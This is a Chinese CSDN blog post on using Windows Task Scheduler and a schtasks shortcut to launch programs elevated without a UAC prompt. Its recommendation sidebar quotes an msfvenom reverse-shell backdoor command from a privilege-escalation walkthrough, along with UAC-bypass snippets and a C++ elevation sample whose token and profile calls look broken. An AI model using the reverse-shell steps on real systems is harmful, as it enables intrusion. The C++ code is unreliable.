绕过UAC提示以管理员身份运行程序

最新推荐文章于 2024-03-27 08:00:00 发布
最新推荐文章于 2024-03-27 08:00:00 发布
阅读量6.5k 收藏 1
点赞数
分类专栏: 操作系统专题

在windows 7下,我们可能经常需要以管理员权限运行某个程序,但每次运行一个程序都得:先找到那个程序,右键鼠标,在弹出菜单中选择以管理员身份运行,而且还会弹出以下窗口,让你点击确认才行。

1

 

有些人可能会选择禁用UAC,但这毕竟对系统的安全存在影响。下面就用一个简单的方法解决这个问题。

这个简单的方法就是利用系统自带的任务计划程序。

 

第一步:创建一个任务来运行你想要运行的程序

任务计划程序在开始菜单->附件->系统工具这个目录下,或者你直接在开始菜单的搜索栏中输入Task Scheduler也可以找到。

tsk_sched1

 

我们在右边点击创建一个新的任务。

task_sched2

 

按照下图设置好新建的任务。

ts_uac1

 

最主要的就是记得勾选Run with highest privileges,任务的名字可以随便你,但是后面还会用到它。

下面在Actions这个Tab目录下,我们还要新建一个Action,这里的Program就是选择你自己需要启动的程序了,如下图

ts_uac2

 

最后,还要再设定一下,让任务能够直接运行,至于能不能重复运行,就看你自己程序的要求了。

ts_uac3

 

OK,我们的任务创建完成,我们可以在任务计划程序里试一下。

找到你创建的任务,右键运行。

ts_uac4

 

你将看到以管理员身份运行出来的cmd,并且没有UAC的提示。

ts_uac5

 

接下来第二步。

 

第二步:为任务创建一个快捷方式

我们不可能每次都得打开任务计划程序再去运行一个程序,所以我们可以创建一个快捷方式,直接双击就能运行了。

随便在你需要创建快捷方式的地方,右键鼠标,选择New->Shortcut

输入以下命令:schtasks /run /tn “CommandPrompt”

这里的CommandPrompt就是你新建的任务名字。

ts_uac6

 

点击Next就创建好了。

现在双击一下你自己创建的快捷方式试试?(提示:你如果依然使用CMD程序的话可能会一闪而过,不过它的确是在管理员权限下的了)

 

 

 

文章引用:

http://www.7tutorials.com/use-task-scheduler-launch-programs-without-uac-prompts

BoomJane
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows UAC权限详解以及因为权限不对等引发的若干问题排查
dvlinker的技术专栏
06-08 3842
Windows UAC权限详解以及因为权限不对等引发的若干问题分享。
Windows提权笔记-UAC绕过详解
墨痕诉清风的博客
03-12 278
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授权提升的访问权限。它将阻止安装程序和未经授权的应用程序在没有管理帐户权限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
window绕开UAC——利用UAC白名单程序提权
甜筒八部 的专栏
11-18 7769
Se在实际开发过程中,可以通过Process Explorer检查服务或程序处于哪个Session,会不会遇到Session 0 隔离问题。我们在Services 中找到之前加载的AlertService 服务,右键属性查看其Session 状态。
权限提升 T1548.002 绕过UAC
qq_28205153的博客
02-17 2115
​1. 什么是 UAC 用户帐户控制 (UAC) 是 Windows Vista 和 Windows Server 2008 开始引入的一种访问控制功能。借助 UAC,应用和任务将始终在非管理员帐户的安全上下文中运行,除非管理员专门授予管理员级别的访问系统权限。 UAC 可阻止自动安装未经授权的应用并防止意外更改系统设置。 我们在运行非微软官方的软件时,即使我们的账号是属于本地管理员组的,也会以普通用户的权限来运行软件。当软件需要更改系统配置或者修改系统关键位置时,往往需要提升自己的权限来执行这些操作,此时
python 跳过_python如何轻松绕过UAC
weixin_39784972的博客
11-24 419
很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯!通过下面的代码我们可以轻松绕过UAC:# -*- coding: utf-8 -*-“”“Created on Mon Jan 8 09:09:51 2018@author: coordinat...
获取管理员权限
weixin_45145710的博客
03-11 700
%Windir%\System32\FLTMC.exe >nul 2>&1 || ( IF EXIST "%TEMP%\AdminRun.vbs" DEL /f /q "%TEMP%\AdminRun.vbs" 2>nul ECHO CreateObject^("Shell.Application"^).ShellExecute "%~f0", "%1", "", "...
Win10安装软件用户账户控制提示管理员已阻止运行此应用解决方法.docx
11-22
2. 关闭防火墙和杀毒软件后,右击安装程序挑选【以管理员身份运行】。这将关闭可能干扰安装程序的防火墙和杀毒软件,然后使用管理员权限运行安装程序。 3. 进入控制面板,查看方式为大图标,点击平安和维护,挑选...
windows UAC绕过原理
lizfs_csdn的博客
04-22 325
1.什么是UAC? 用户账户控制,User Account Control 首先我们看一下程序启动后,UAC的流程图: 如果关闭UAC,则程序会提权运行。 Privilege Contents: 如果启动了UAC程序要求提权运行或者以管理员身份运行的时候,System会启动Consent.exe进程。 在UAC开启的情况下,即使用户选择否,也会开启UAC虚拟化:1.UAC虚拟化后,应用程序会重定向到其他位置,用户依然可以正常使用程序,但应用程序写入的数据不会在真实系统生效,以防
Windows 中的 UAC 用户账户控制
walterlv - 吕毅
05-05 8521
阅读本文,你可以初步了解 Windows 上的 UAC 用户账户控制机制。本文不会涉及到 UAC 的底层实现原理和安全边界问题。 本文内容用户账户UAC 通知等级完整性级别(Integrity Level)权限提升 用户账户 在 Windows 中有多种不同的账户: SYSTEM Administrators 用户组 Administrator 管理员账户 Users 用户组 标准账户...
设置电脑中的某个程序不弹出UAC用户控制提示的方法
weixin_30487317的博客
04-27 2687
有用户发现在电脑开机后总是会弹出UAC用户账户控制窗口,这是因为电脑中的某个程序设置了开机启动,这样就会在开机后启动该程序时出现UAC提示。如果想要省略该提示,可以在电脑中设置该程序不弹出UAC用户控制提示,具体请看以下设置方法。 1、按Win+R打开运行,输入regedit,并回车打开注册表编辑器; 2、找到 HKEY_CURRENT_USERS\Software\Microsof...
CMD命令行中以管理员权限启动应用程序实现方法
09-21
主要介绍了CMD命令行中以管理员权限启动应用程序实现方法,本文使用一个JS脚本来实现,需要的朋友可以参考下
易语言防止调试陷阱
06-10
可以有效的防止OD等调试工具,对软件的调试,不想加壳的人可以看看,只能算是一个启发吧。具体在软件里面的使用位置,还要看个人的,不过我一般在登陆的位置加。
易语言调试助手(特殊思路免UAC权限)-易语言
06-12
调试助手 将软件快速编译出来,然后自动运行,免去UAC权限之苦,对于TX游戏内调试或开着360调试比较方便 (360需要设置开发者文件夹,达到免误报效果)
绕过UAC 不弹窗启动程序的方法
slfkj的博客
12-23 1529
https://baijiahao.baidu.com/s?id=1678518589760092233&wfr=spider&for=pc
低权限绕过UAC
qq_45300786的博客
12-19 684
先用msfvenom做一个码,上传到目标机,获得一个低权限的shell,然后getsystem,失败 目标机的管理员用户,那么接下来我就用这个y1用户登录 目标机的ip kali的ip 制作一个名为mantouka的后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.34 LPORT=6666 -f exe > mantouka.exe 用python开启一个简易的http服务 python3 -m http.se
“在禁用 UAC 时,无法激活此应用”问题解决
wzj_wp的博客
11-26 1377
微信推送消息的脚本运行时报这个错误 打开cmd窗口,输入以下命令: 如图所示位置找到EnableLUA,双击 重启!!!
绕过UAC管理员身份启动程序
zyw_anquan的专栏
04-07 6522
绕过UAC管理员身份启动程序 写这篇文章主要是看到了:http://www.7tutorials.com/use-task-scheduler-launch-programs-without-uac-prompts文章中所用到的方法,于是想记录下来 UAC不用多说,往往我们要用管理员身份运行一个程序的时候,总是要有一个提示框: 可能会有用户选择禁用UAC,但这毕竟对系统的安全存在
权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
最新发布
siu~
03-27 926
1、计算机用户到System-入口点和应用点 2、计算机用户到System-UAC绕过&DLL劫持&未引号服务 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
c++ 让指定进程以管理员权限运行,并且绕过UAC提示
05-26
在 Windows 中,要以管理员权限运行一个进程并绕过 UAC 提示,可以使用以下方法: 1. 使用 ShellExecuteEx 函数启动进程。该函数可以在指定的进程上下文中启动应用程序。 2. 在启动进程之前,需要创建一个管理员特权的进程令牌。可以使用 OpenProcessToken 和 DuplicateTokenEx 函数来创建一个管理员特权的令牌。 3. 使用 CreateProcessAsUser 函数以管理员权限运行指定的进程。这个函数会将进程启动在指定的用户上下文中。 下面是一个简单的 C++ 代码示例: ``` #include <windows.h> #include <sddl.h> #include <userenv.h> #include <shlobj.h> #include <iostream> void RunElevated(const wchar_t* cmdLine) { SHELLEXECUTEINFO sei = { sizeof(sei) }; sei.lpVerb = L"runas"; sei.lpFile = cmdLine; sei.hwnd = NULL; sei.nShow = SW_NORMAL; if (!ShellExecuteEx(&sei)) { DWORD error = GetLastError(); if (error == ERROR_CANCELLED) { // The user refused to allow privileges elevation. std::cerr << "User refused to allow privileges elevation.\n"; } else { std::cerr << "Failed to elevate privileges. Error code: " << error << "\n"; } } } int main() { // Get the current process token. HANDLE tokenHandle; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &tokenHandle)) { std::cerr << "Failed to open process token. Error code: " << GetLastError() << "\n"; return 1; } // Duplicate the token with admin privileges. HANDLE elevatedTokenHandle; if (!DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityIdentification, TokenPrimary, &elevatedTokenHandle)) { std::cerr << "Failed to duplicate process token. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); return 1; } // Set the elevation level of the new token to full. TOKEN_ELEVATION_TYPE elevationType; DWORD elevationSize = sizeof(TOKEN_ELEVATION_TYPE); if (!GetTokenInformation(elevatedTokenHandle, TokenElevationType, &elevationType, sizeof(elevationType), &elevationSize)) { std::cerr << "Failed to get token information. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); return 1; } if (elevationType != TokenElevationTypeFull) { TOKEN_ELEVATION elevation = { 0 }; elevation.TokenIsElevated = 1; if (!SetTokenInformation(elevatedTokenHandle, TokenElevation, &elevation, sizeof(elevation))) { std::cerr << "Failed to set token information. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); return 1; } } // Get the user name and domain name for the current user. DWORD size = 0; GetUserNameEx(NameSamCompatible, NULL, &size); std::wstring userName(size, L'\0'); GetUserNameEx(NameSamCompatible, &userName[0], &size); size = 0; GetComputerNameEx(ComputerNameDnsDomain, NULL, &size); std::wstring domainName(size, L'\0'); GetComputerNameEx(ComputerNameDnsDomain, &domainName[0], &size); // Create the user profile for the new user token. PROFILEINFO profileInfo = { sizeof(profileInfo) }; profileInfo.dwFlags = PI_NOUI; profileInfo.lpUserName = &userName[0]; profileInfo.lpProfilePath = L""; profileInfo.lpDefaultPath = L""; profileInfo.lpServerName = &domainName[0]; profileInfo.lpPolicyPath = L""; profileInfo.hProfile = NULL; DWORD sessionId; HANDLE userTokenHandle; if (!CreateProfile(&profileInfo, &userTokenHandle)) { std::cerr << "Failed to create user profile. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); return 1; } if (!ProcessIdToSessionId(GetCurrentProcessId(), &sessionId)) { std::cerr << "Failed to get session ID. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); CloseHandle(userTokenHandle); return 1; } if (!ImpersonateLoggedOnUser(userTokenHandle)) { std::cerr << "Failed to impersonate user. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); CloseHandle(userTokenHandle); return 1; } // Get the path to the executable. wchar_t exePath[MAX_PATH]; if (GetModuleFileName(NULL, exePath, MAX_PATH) == 0) { std::cerr << "Failed to get executable path. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); CloseHandle(userTokenHandle); return 1; } RunElevated(exePath); // Restore the original token and close the elevated token. if (!RevertToSelf()) { std::cerr << "Failed to revert to self. Error code: " << GetLastError() << "\n"; CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); CloseHandle(userTokenHandle); return 1; } CloseHandle(tokenHandle); CloseHandle(elevatedTokenHandle); CloseHandle(userTokenHandle); return 0; } ``` 这个代码示例使用了 ShellExecuteEx 函数来以管理员权限运行指定的进程。如果进程启动失败,将会输出错误信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值